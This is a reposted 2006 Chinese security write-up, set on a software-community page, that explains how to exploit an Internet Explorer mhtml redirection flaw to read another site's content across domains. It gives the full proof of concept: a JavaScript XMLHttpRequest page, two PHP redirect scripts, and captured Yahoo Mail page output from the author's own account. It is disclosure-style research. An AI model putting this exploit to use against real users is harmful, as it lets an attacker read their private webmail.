IE mhtml redirection漏洞利用方法安全防线->漏洞分析 || Visual Basic 开发中心立华软件园打造最专业的安全技术开发社区

登录社区：用户名: 密码: 忘记密码

网页功能：加入收藏设为首页网站搜索

文档

下载

图书

论坛

安全

源码

硬件

游戏

首页信息空间 VB VC Delphi Java Flash 补丁控件安全黑客电子书笔记本手机 MP3 杀毒 QQ群产品库分类信息编程网站

立华软件园 - 安全技术中心 - 技术文档 - 漏洞分析

安全技术技术文档

· 安全配制

· 工具介绍

· 黑客教学

· 防火墙

· 漏洞分析

· 破解专题

· 黑客编程

· 入侵检测

安全技术工具下载

· 扫描工具

· 攻击程序

· 后门木马

· 拒绝服务

· 口令破解

· 代理程序

· 防火墙

· 加密解密

· 入侵检测

· 攻防演示

安全技术论坛

· 安全配制

· 工具介绍

· 防火墙

· 黑客入侵

· 漏洞检测

· 破解方法

其他安全技术资源

· 攻防演示动画

· 电子图书

· QQ群组讨论区

· 其他网站资源

最新招聘信息

IE mhtml redirection漏洞利用方法

发表日期：2006-10-14作者：ph4_yunshu (wustyunshu_at_hotmail.com)[转贴] 出处：

IE mhtml redirection漏洞利用方法

Author：yunshu_[At]_ph4nt0m.org
Team：http://www.ph4nt0m.org
Data: 2006-05-11

这个漏洞主要是信息泄露，参见http://secunia.com/advisories/19738/的具体描述。为了保证客户端安全，xmlhttp是无法跨域获取信息的。但是IE出现安全问题，在服务端通过mhtml重定向漏洞，可以利用xmlhttp跨域获取敏感信息。我测试是我登陆了Yahoo Mail之后，通过漏洞可以成功获取到邮件资料。漏洞报告说影响IE6.0，我使用IE7同样遭到攻击。

下面是主页面，通过xmlhttp请求本域的页面。（这里改成直接访问其他域会出现拒绝访问错误）

<html>

<head>

<script language="JavaScript">

// Start XML HTTP Request Object

var request = InitXMLHttpRequest();

function StartTest()

{

document.getElementById("result").innerHTML = "init ok<br />";

document.getElementById("result").innerHTML += "begain open<br /> ";

// Open/

request.open('GET', 'http://www.icylife.net/valu1.php', true);

document.getElementById("result").innerHTML += "begain send<br /> ";

request.onreadystatechange = WhenDone;

// Make the request

request.send();

}

// Function for Initialising the XMLHttpRequest

function InitXMLHttpRequest()

{

var request;

try

{

request = new XMLHttpRequest();

}

catch (trymicrosoft)

{

try

{

request = new ActiveXObject("Msxml2.XMLHTTP");

}

catch (othermicrosoft)

{

try

{

request = new ActiveXObject("Microsoft.XMLHTTP");

}

catch (failed)

{

request = false;

}

}

}

// Initialised?

if ( !request )

{

alert("Due to limitations of your browser you will not be able to use this page.");

}

else

{

return request;

}

}

function WhenDone( )

{

if ( request.readyState == 4 )

{

document.getElementById("result").innerHTML = request.responseText;

}

}

</script>

</head>

<body>

<b>Start the test:</b><br>

<div id="start"><a href="javascript:StartTest();"><font color="#000000">Test Now</font></a></div>

<br />

<div id="result"></div>

</body>

</html>

这里是第二个页面，利用mhtml重定向，代码很简单。

<?php

header("Location: mhtml://http://icylife.net/valu2.php");

?>

再就是第三个，重定向到yahoo mail。

<?php

header("Location: http://mail.yahoo.com.cn/");

?>

我登陆了mail之后，攻击结果片段如下：

<html>

<head><META HTTP-EQUIV="content-type" CONTENT="text/html; charset=gb2312">

<title>

Yahoo!电邮 - wustyunshu@yahoo.com.cn</title>

<script type="text/javascript">



</script>

<noscript>

<META HTTP-EQUIV=Refresh CONTENT="0; URL=/ym/login?nojs=1">

</noscript>

【我来说两句】【发送给朋友】【加入收藏】【返加顶部】【打印本页】【关闭窗口】

在

中搜索 IE mhtml redirection漏洞利用方法

■ [欢迎对本文发表评论]

用　　户：　匿名发出：

您要为您所发的言论的后果负责，故请各位遵纪守法并注意语言文明。

最新招聘信息